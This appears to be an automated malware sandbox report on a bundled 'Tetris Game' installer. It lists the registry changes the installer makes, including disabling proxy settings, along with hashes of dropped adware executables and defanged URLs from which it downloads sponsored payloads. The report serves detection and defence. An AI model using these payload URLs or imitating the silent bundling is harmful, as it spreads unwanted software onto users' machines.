The process cbead634babe14801c0b14d3517a10f8.tmp:2428 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash" = "83 35 58 F2 B7 1B 8E 37 C3 EF E4 2E 6A EE E2 A5"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\The Tetris Game_is1]
"InstallLocation" = "%Program Files% (x86)\The Tetris Game\"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFiles0000" = "%Program Files% (x86)\The Tetris Game\Tetris.exe"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\The Tetris Game_is1]
"Inno Setup: Selected Tasks" = "desktopicon"
"QuietUninstallString" = "%Program Files% (x86)\The Tetris Game\unins000.exe /SILENT"
"UninstallString" = "%Program Files% (x86)\The Tetris Game\unins000.exe"
"DisplayName" = "1.0"
"Publisher" = "www.thetetrisgame.com"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"SessionHash" = "6B 15 7D DD 16 00 73 D4 F4 A8 78 84 41 48 2D 05"
"Owner" = "7C 09 00 00 AE 5E 42 39 30 7A D0 01"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\The Tetris Game_is1]
"NoModify" = "1"
"Inno Setup: Icon Group" = "The Tetris Game"
"Inno Setup: App Path" = "%Program Files% (x86)\The Tetris Game"
"HelpLink" = "http://www.thetetrisgame.com"
"EstimatedSize" = "1700"
"URLInfoAbout" = "http://www.thetetrisgame.com"
"URLUpdateInfo" = "http://www.thetetrisgame.com"
"Inno Setup: Language" = "eng"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 48 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\The Tetris Game_is1]
"NoRepair" = "1"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\The Tetris Game_is1]
"Inno Setup: Setup Version" = "5.5.3 (a)"

"Inno Setup: Deselected Tasks" = ""
"Inno Setup: User" = "%CurrentUserName%"
"InstallDate" = "20150419"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0000]

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"Owner"
"RegFiles0000"
"SessionHash"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
447013bc6abd3a3f663a1fe7cdebd114 c:\Program Files (x86)\App Lid\01783b5d-40d7-41d4-9ba0-a7e585dc1505-4.exe
4eea1048ef95c49a2fe5e7e32122a7b4 c:\Program Files (x86)\App Lid\01783b5d-40d7-41d4-9ba0-a7e585dc1505-5.exe
afb246326bbe7f10270ec63997088ae0 c:\Program Files (x86)\App Lid\Uninstall.exe
8ac380009e5b490b9bc5db1ccb916d3a c:\Program Files (x86)\App Lid\utils.exe
fc46ab7a03ed8decca9d2920d8f58e14 c:\Program Files (x86)\SensePlus\19fa6da2-7e70-4168-ae8d-59d51e43be31-4.exe
cc9de5318d5644eac8f635571fce787b c:\Program Files (x86)\SensePlus\19fa6da2-7e70-4168-ae8d-59d51e43be31-5.exe
32404ebe068816c125b070e67ccd54c2 c:\Program Files (x86)\SensePlus\Uninstall.exe
5c414b4392e5cf949578cb99bd596802 c:\Program Files (x86)\SensePlus\utils.exe
52966dce95543e6c352fcb58a96e345a c:\Program Files (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.exe
01f2e778931f2b1a27d099f593d37c14 c:\Program Files (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.sys
52966dce95543e6c352fcb58a96e345a c:\Program Files (x86)\ShopperPro\JSDriver\jsdrv.exe
01f2e778931f2b1a27d099f593d37c14 c:\Program Files (x86)\ShopperPro\JSDriver\jsdrv.sys
ae16830ee262db8142dcf54832529281 c:\Program Files (x86)\ShopperPro\SPRemove.exe
694a08f19396a6654409971d7e9edd6f c:\Program Files (x86)\ShopperPro\ShopperPro.dll
6e880bdeda3d61f8dc9d3269969a9c3a c:\Program Files (x86)\ShopperPro\ShopperPro.exe
72e5be95d3df6b352c958588ed895c7d c:\Program Files (x86)\ShopperPro\ShopperPro64.dll
166d14a2666b82836fb1ef90863fe37b c:\Program Files (x86)\ShopperPro\Updater.exe
fd8444496ebd0df0a1fc5247c438997e c:\Program Files (x86)\The Tetris Game\Tetris.exe
b4b4f34d21d413f820c75ac711b3c7e7 c:\Program Files (x86)\The Tetris Game\unins000.exe
33a33e52e9c7db9063cbac82fa9e28d4 c:\Program Files (x86)\XTab\BrowerWatchCH.dll
9def3a62487338e892ce4fffa8efa5d2 c:\Program Files (x86)\XTab\BrowerWatchFF.dll
5785680870eff9ba7b4f58c726552013 c:\Program Files (x86)\XTab\BrowserAction.dll
7e4e734d5adbbc4026a5db2e63c29d40 c:\Program Files (x86)\XTab\CmdShell.exe
8c15f35314eadbe08375dd47ad62439a c:\Program Files (x86)\XTab\HPNotify.exe
e6aac50b9fc19546c5e524c47be5d66d c:\Program Files (x86)\XTab\IeWatchDog.dll
e98c5cfa4051bfa3e2cb0afb10ff4cab c:\Program Files (x86)\XTab\ProtectService.exe
fc60e0ceb67207edd48ed4acbea5de98 c:\Program Files (x86)\XTab\SupTab.dll
3e29914113ec4b968ba5eb1f6d194a0a c:\Program Files (x86)\XTab\msvcp110.dll
4ba25d2cbe1587a841dcfb8c8c4a6ea6 c:\Program Files (x86)\XTab\msvcr110.dll
ff73e8efe2b7f0f134dda89694299ff5 c:\Program Files (x86)\XTab\uninstall.exe
99762975ae78b591fa6699cc460bb5f7 c:\Program Files (x86)\YTAHelper\JSDriver\jsdrv.exe
43901c75bcf54be31a8f15bae77a3865 c:\Program Files (x86)\YTAHelper\JSDriver\jsdrv.sys
e0e06dca0f07ebaba0545450d0f69ade c:\Program Files (x86)\YTAHelper\YTAHelper.dll
c254e02e1b6fe3b7f33426bebb9e6af2 c:\Program Files (x86)\YTAHelper\YTAHelper.exe
a3b46b4c5d373c51e6e489bb603dba9f c:\Program Files (x86)\YTAHelper\YTAHelper64.dll
76f41068f2fa82523736c58c6a6a27db c:\Program Files (x86)\YouTube Accelerator\Res.dll
973567b98cdfc147df4e60471d9df072 c:\Program Files (x86)\YouTube Accelerator\UNWISE.EXE
850e72f521667f04a1fa06bc92311b37 c:\Program Files (x86)\YouTube Accelerator\Updater.exe
29605c3fee628f62dea028a354425e3f c:\Program Files (x86)\YouTube Accelerator\YTAHUninstall.exe
4a53830f2e9fa95a7873dcebd0249e80 c:\Program Files (x86)\YouTube Accelerator\YTAUninstall.exe
46e2c40e8adae15d5e3a164e7b65fe40 c:\Program Files (x86)\YouTube Accelerator\YouTubeAccelerator.exe
a77332904ccef3efc9dbb27bfc8dfd31 c:\Program Files (x86)\YouTube Accelerator\YouTubeAcceleratorService.exe
3f4049d8bf040812a96680c5a6b377fd c:\Program Files (x86)\YouTube Accelerator\cabex.dll
f756379f1f0fbad6bcf53170aa804918 c:\Program Files (x86)\YouTube Accelerator\engine.dll
81baf300ca0dc9a3d557d0e84567b1a2 c:\Program Files (x86)\YouTube Accelerator\helper.dll
c014a1dddb4677f54f88efaaa492ddce c:\Program Files (x86)\YouTube Accelerator\ipc.dll
f6ac21939884df5c0201cdf1ead06b90 c:\Program Files (x86)\YouTube Accelerator\lspinst.exe
2c3a467735e2d937ce44034869b43231 c:\Program Files (x86)\YouTube Accelerator\lspinst2.exe
a082e5473b2a9a4d846ed7ddf637ac76 c:\Program Files (x86)\YouTube Accelerator\sporder.dll
5e2c0de2f0f15923154293dea89d196b c:\Program Files (x86)\YouTube Accelerator\testlsp.exe
39d9593e5c43d81fe9724fb0f7b16cc0 c:\Program Files (x86)\YouTube Accelerator\unelevate.exe
e0024c585767d4851de5e7331ac91ee5 c:\Program Files (x86)\YouTube Accelerator\xmldb.dll
c84cbb44c3aca460522eba9bd033cd62 c:\Program Files (x86)\YouTube Accelerator\ytalsp.dll
32404ebe068816c125b070e67ccd54c2 c:\Program Files (x86)\iWebar\Uninstall.exe
12cd890d74fd8ef561e6ab376d6bf3e4 c:\Program Files (x86)\iWebar\cfeca700-7b58-4ebe-8806-aa3ea96213cd-4.exe
e583611ba16edc45e960acad892e4148 c:\Program Files (x86)\iWebar\cfeca700-7b58-4ebe-8806-aa3ea96213cd-5.exe
a4aa20594ad8ca0dcd55a471fecaafcf c:\Program Files (x86)\iWebar\utils.exe
8e421dcabfbdef362fd59d6c07e6254a c:\Program Files\Common Files\ShopperPro\spbia.exe
99f03685023d1f7c5b054e350ff1777b c:\Program Files\Common Files\ShopperPro\spbici32.dll
eea15cef4e717591644d6f7c05ebd91b c:\Program Files\Common Files\ShopperPro\spbici64.dll
8d9c4081a36697e2399e807537b5c0ea c:\Program Files\Common Files\ShopperPro\spbii32.exe
ba05fe60ff116d6038c0897b9b89538f c:\Program Files\Common Files\ShopperPro\spbii64.exe
e5cc90468b7a26c68bd642bd31644f1f c:\Program Files\Common Files\ShopperPro\spbiu.exe
b096795ad533bcb17a9bdf2a086f6c23 c:\Program Files\Common Files\ShopperPro\spbiw.sys
694a08f19396a6654409971d7e9edd6f c:\ProgramData\ShopperPro\ShopperPro.dll
72e5be95d3df6b352c958588ed895c7d c:\ProgramData\ShopperPro\ShopperPro64.dll
f94557f8fd41731a3d180383a516fbe3 c:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
e0e06dca0f07ebaba0545450d0f69ade c:\ProgramData\YTAHelper\YTAHelper.dll
a3b46b4c5d373c51e6e489bb603dba9f c:\ProgramData\YTAHelper\YTAHelper64.dll
694a08f19396a6654409971d7e9edd6f c:\Users\All Users\ShopperPro\ShopperPro.dll
72e5be95d3df6b352c958588ed895c7d c:\Users\All Users\ShopperPro\ShopperPro64.dll
f94557f8fd41731a3d180383a516fbe3 c:\Users\All Users\WindowsMangerProtect\ProtectWindowsManager.exe
e0e06dca0f07ebaba0545450d0f69ade c:\Users\All Users\YTAHelper\YTAHelper.dll
a3b46b4c5d373c51e6e489bb603dba9f c:\Users\All Users\YTAHelper\YTAHelper64.dll
a9f1ecb4159ecaf56bbe555f81374f25 c:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe
ea0ca98847dc1a403ffec3be116e8b2f c:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_23184\DCytaiesmt_smtyc_setup.exe
ea0ca98847dc1a403ffec3be116e8b2f c:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_28897\DCytaiesmt_smtyc_setup.exe
3a2c68e9cbafd44cb7522aa5e917f196 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\setup[1].exe
bffb5305f6a32816883d245fa67c49cb c:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp
5fc7a542d881062fdd609c93c584d8f7 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_iwebar.exe
d210d2742f98bd1be90c33d5cff331a3 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_sense.exe
264d5a79c1ebf3bda62be98f2e6ff8b4 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_shopperpro.exe
f8076da03b6b36fa1ec0bd5a082d8d95 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_yta.exe
45960b40c1ecb75ed5549a80049879e1 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\AniGIF.ocx
76f41068f2fa82523736c58c6a6a27db c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\Res.dll
29605c3fee628f62dea028a354425e3f c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YTAHUninstall.exe
6f4f8c2cb7e07436aa59a72c89fbaa4a c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YTAHelperSetup.exe
46e2c40e8adae15d5e3a164e7b65fe40 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YouTubeAccelerator.exe
a77332904ccef3efc9dbb27bfc8dfd31 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YouTubeAcceleratorService.exe
f756379f1f0fbad6bcf53170aa804918 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\engine.dll
81baf300ca0dc9a3d557d0e84567b1a2 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\helper.dll
c014a1dddb4677f54f88efaaa492ddce c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\ipc.dll
f6ac21939884df5c0201cdf1ead06b90 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\lspinst.exe
2c3a467735e2d937ce44034869b43231 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\lspinst2.exe
a082e5473b2a9a4d846ed7ddf637ac76 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\sporder.Dll
5e2c0de2f0f15923154293dea89d196b c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\testlsp.exe
39d9593e5c43d81fe9724fb0f7b16cc0 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\unelevate.exe
850e72f521667f04a1fa06bc92311b37 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\updater.exe
e0024c585767d4851de5e7331ac91ee5 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\xmldb.dll
c84cbb44c3aca460522eba9bd033cd62 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\ytalsp.dll
4a53830f2e9fa95a7873dcebd0249e80 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\ytauninstall.exe
518879abe3170dabd172dfffcd165598 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe
3f4049d8bf040812a96680c5a6b377fd c:\Users\"%CurrentUserName%"\AppData\Local\Temp\cabex.dll
10bd2af1b07ec6bc9cd17ba512569e59 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\install20087.exe
3a9ce8edf728d00a44376a75fe7b2aca c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\AccDownload.dll
f0438a894f3a7e01a4aae8d1b5dd0289 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\nsProcess.dll
6f7d9e111a17fab195efe0bbd3a0442d c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\AccDownload.dll
faa7f034b38e729a983965c04cc70fc1 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso95FA.tmp\nsProcess.dll
ea0ca98847dc1a403ffec3be116e8b2f c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\DCytaiesmt_smtyc_setup.exe
d851e6f35015abef9a726b0738dded8b c:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe
39d9593e5c43d81fe9724fb0f7b16cc0 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\unelevate.exe
3663b55452d8e814f62d6fae8eb32d65 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\XTab_Setup2121.exe
f94557f8fd41731a3d180383a516fbe3 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\wpm_v20.0.0.1953_0302.exe
acf2f3ad315964ec2ed1ec4e61bd1f96 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe
4f9236be13917b89f7a03dea85f220fa c:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe
d8ba5f4e6a1594d0e07c886dac0f5f8c c:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe
a5bfd6a87161d5dfa81cb5c2c6d29488 c:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe
45960b40c1ecb75ed5549a80049879e1 c:\Windows\SysWOW64\AniGIF.ocx
45960b40c1ecb75ed5549a80049879e1 c:\Windows\System32\AniGIF.ocx

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: www.thetetrisgame.com
Product Name: The Tetris Game
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description: The Tetris Game Setup
Comments: This installation was built with Inno Setup.
Language: English (Australia)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 40240 40448 4.59679 c3bd95c4b1a8e5199981e0d9b45fd18c
DATA 45056 592 1024 1.90742 1ee71d84f1c77af85f1f5c278f880572
BSS 49152 3724 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 53248 2384 2560 3.07115 bb5485bf968b970e5ea81292af2acdba
.tls 57344 8 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 61440 24 512 0.14174 9ba824905bf9c7922b6fc87a38b74366
.reloc 65536 2244 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 69632 11264 11264 3.11723 9aeb0564a5cb633c0b33dd6a7d90d927

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 16
d7b21441310cfa8238c4229093e23953
d53c218b3aeb5de974d7aba6ab259bc2
ce9ff0607c4df926b5fc9da5d02a0e70
08a60448bae874eb9e1a189ec0ed976e
f77284e3d64dbc9a243eaa2182794bbc
f66f98575a3ee6a3ad8a8db364e19cb1
116bfa1969112f7b132548112eb03ddf
784c8548ac0ee88e3644e2f1321ad22b
05a13fb9d1074c08e872af4a4c427812
94040e847c7a097083e9f99cd48d6998
fd92e71127eb39522106492e59f9c375
e25338d1f4270789ac1c9bd52d7a612f
add90013229e66d286550b611435aa58
de7cee1496bd3542ac9ff234ffb57a8b
5f255bd537de3c60f19811bc9c03bc78
43866fa257d7c77da459dd4957eab6f5

URLs

URL IP
hxxp://installer.betterinstaller.com/binno/get_pre_offering_checks?uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&v=2.1.1&affid=thetetrisgame&sid=thetetrisgameezsg&s=0
hxxp://installer.betterinstaller.com/binno/xml?uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&v=2.1.1&affid=thetetrisgame&sid=thetetrisgameezsg&s=0
hxxp://dl8osqulq9t07.cloudfront.net/installers/bi_downloader/1429398342407/setup.exe
hxxp://d3hnlp5dtgb93r.cloudfront.net/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
hxxp://d3hnlp5dtgb93r.cloudfront.net/installer/ajax-bidl?offers[youtubeaccelerator][exec_args]=/S /MAG=smtyc &offers[swiftrecord][exec_args]=/np 1 /is smp1ua &offers[istartsurf][exec_args]=-silence -ptid=smt &offers[appshat_madness][exec_args]=/S /affid=appshatmadness&uid_orig=F6EC7CBD433C497E8CB84BD73DB5F5E3&uid=4a9fc2e26d3c3249b974ded373db7ae1&tokyo_csrf_key=30dac423b2616dcb0f6bc321e4d0a8d9&tokyo_csrf_timestamp=1429400111&ffInstalled=false&dfz=false&affid=thetetrisgame&sid=thetetrisgameezsg&country=UA&hostBrowser=ie&unique_id=false
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=youtubeaccelerator&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=1&index_in_screen=1&index_in_session=1&0.3328616623796952
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=swiftrecord&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=2&index_in_screen=1&index_in_session=2&0.4368301195221277
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=istartsurf&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=3&index_in_screen=1&index_in_session=3&0.04203975819833361
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=appshat_madness&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=4&index_in_screen=1&index_in_session=4&0.224164603995264
hxxp://d2otsfra4otprh.cloudfront.net/mag/ytaiesmt_smtyc_setup.exe 54.230.47.157
hxxp://dl8osqulq9t07.cloudfront.net/images/Tokyo/tokyo_sprite_full.png
hxxp://a1726.d.akamai.net/sd?is=sm
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=install_start&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=youtubeaccelerator&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=1&index_in_screen=1&index_in_session=1&0.9877884424624551
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/29141.ashx?e=043Mckb8Lnhw7iCtSAyu//3K4Um6afGylFbWIrYO79FAXdQqxJ1va3sc7hbJtTJHVR5AawbKoxq2WoUK/ytStDqVCe9eXWcZYCpHZc9ZUaG/QElqGjn9p9CUHeR8YCF3sp NWI2cIlsE8XIWrh60PYXV1rPYBwrFqy2cd4qoQDl0oePvh0n93CgN3uGHcox9 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/29141.ashx?e=043Mckb8Lnhw7iCtSAyu//3K4Um6afGylFbWIrYO79FAXdQqxJ1va3sc7hbJtTJHVR5AawbKoxq2WoUK/ytStDqVCe9eXWcZYCpHZc9ZUaH6MIOzDij/FhQC drCF7eF njmPLTFBJTHZ0SBJrLapqEsFB7attMxqzK4ONZfy8uwkk WHLaN3BOpzAENMeu5HLnHRSngDc8= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/t.ashx?e=lOCrbsNL2zWQ5lb rGZVAri3muUffR3jI0kPktKhKyd4E7mrr1h80riKIFo3W8f23Wq7IsWCDz75CWDwEisd59aoPZj94HyTXeFaoUgIZNgjlVbxwk2 SY4G r 3F6T7Ye9UEEkdnkbYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW Q== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/install.ashx?e=lOCrbsNL2zWQ5lb rGZVAri3muUffR3jKmDaOTMoLIjoUht0DV8eHWD3h9gcT/r2iwEbfeVtNep9AGHLpPN9dvm9MH d93Mvga zuhV9q9Hxu1y 6Ac0RKhN6psLdnSsdosECI4dMRD6OfU8/FMPXH6dYg1rlTgUy/ecrRsbq5tpfYOBgM/eiVGOPVXIjHvBpTJ2ibhTIXvL Evyupn5FoSAG857z6vSJoFp5BSgEe3Or7WZbrDrQA0K6wxeD7aRji4XER0T3SsRjhY3fDkRrbFQmXPNpoklPLuavJrfzx3SY2lnXaqmudis9e3mVlqWe/fAkvYFtt65Nw1wKmcLnW1QjAzn1XLpcMPDO l3UUtc7JTfzqJuQ2xNoUmVdbK77K3bmITDI9vVQ7t2OrbhY5/k5hJWQvF3XVs6Y tAG2M= 198.232.124.192
hxxp://www.girlliuxiaowei.com/home/smt_istartsurf.exe 208.43.230.100
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/29141.ashx?e=lOCrbsNL2zXk4TYbHkoM1L0oSfJOuBg0a6Y79bPE7emMDmRWpWBZ0PxJo1EJGyYRjOluN4MfK81xebCnHQAai QVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlGfaDF4SP6aVUeZLRmueCpr 7rPtSKe/ LeHocDMDEaHrXIxNf6X/p8jq1U t1gQfOJGi8wh2qItjgb6v7cXpPvVs 1hpnKPWNckWery5nY61wQMeOGfVSoE8XIWrh60PYXV1rPYBwrFqy2cd4qoQDl0oePvh0n93NexvF9Z3oAvVYgO0yHAHEt6xicSXLpiF7kRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtY4 ujlnobk4U= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/29141.ashx?e=A3ANzFv7fWBPNjxRBLtb47Cu3p0EgVSl/WD6e6SZIIExLHUkaU0662DlNcv2CDURj6Fy3X7tYh7DeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6OkXwF8xC533Fcga zuhV9q9HGaaeypH4ODX9jkGYCiUPVGxrTqW15vZAdYLC6Fwg82dCUHeR8YCF3vY2zn59BhCiswSelSpyJQqsyuDjWX8vLsJJPlhy2jdwTqcwBDTHruXFWs3G3PXIRldmt6Vgk8tRh09P2euWs7DNOG/9VewUVSSIP/9IuWNMhRQ0/M2ql1D4hBwvKipyt13PeVkHuHVk= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=M7A8vgjJHrj4MZomVx105Tcx3WaqDyI8mkbcHfsclGUDt2EUeZbtRVHmS0Zrngqa/u6z7Uinv/hOGjGA0YZy30CN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DoltPqJisDtFzxhmiufAlHSiFcsvZ1RPeaMg glO3beFp/JLGd4 8dfjKLkxr/pAddBafUMrGaOhUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKefkrhIRbuxR4i7hnHdhdcduQ/fd4pcRUO5yQynRUZI5Y08jY48xBJr38Km4JMgAXQ== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/t.ashx?e=IwLHwtP2rDe9KEnyTrgYNDpM WXU2ev5jA5kVqVgWdAgLxC0aXqYrYyox39H7ctI2j/LgkcsObQY7r2o/YNuRFi2s6XsF8NY17e6nA3xYScE8SFHLIEPsM3UKcKGG9ndxuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJc/JW5G9GpuGA== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/install.ashx?e=hWfaA75NtHH85nz5m58wW/3K4Um6afGyh/JbJ35jG8NZxrddMpcl9iuIlCBhM10qy/hL8rqZ RaEgBvOe8 r0o/iiYZxylfDjKjHf0fty0gJvLuonclT9KsmG/QcpI3t8jaU320NFtWR2G31gFuf02hbuYqdnYR4elHMzi3I9ndbsUN4BYD1D8brniShQ3GQtRzip5AcKg4rWxcpBkHhSQ3kCpSb73om1nmEvUc rydewhrFWYF5Tv0qJ78sIh84amSSgMHjLmQAkaiKC91AannFaQMUFf3agVhnL6oJP/krWxcpBkHhSQ3kCpSb73om1nmEvUc ryfLtaw9zNAybItGWMfwQWPTSZrRYQUgrCCNPc8M0MF2aRqGwFt9gDlur0z2m5iDPRGLrldSVYX6DDrXuhDjTe7cjgNUdiNhvarEQZWzelk5mfjLSd7YlIFWg0zysAorDwLYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW ax5eone962kYdPT9nrlrOwzThv/VXsFFUkiD//SLljTIUUNPzNqpdQ IQcLyoqcrddz3lZB7h1Z 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=M7A8vgjJHrj4MZomVx105Tcx3WaqDyI8mkbcHfsclGUDt2EUeZbtRVHmS0Zrngqa/u6z7Uinv/hOGjGA0YZy30CN9h bV19VoPPb/i9FtJTgL4xsffnkQbPiCC4paVhdAGW4B5KF0X3G4Lnbcm9hh1KSSkgkzJM10ClxJsX5qO1ZySIyJVh8lz8lbkb0am4Y 198.232.124.192
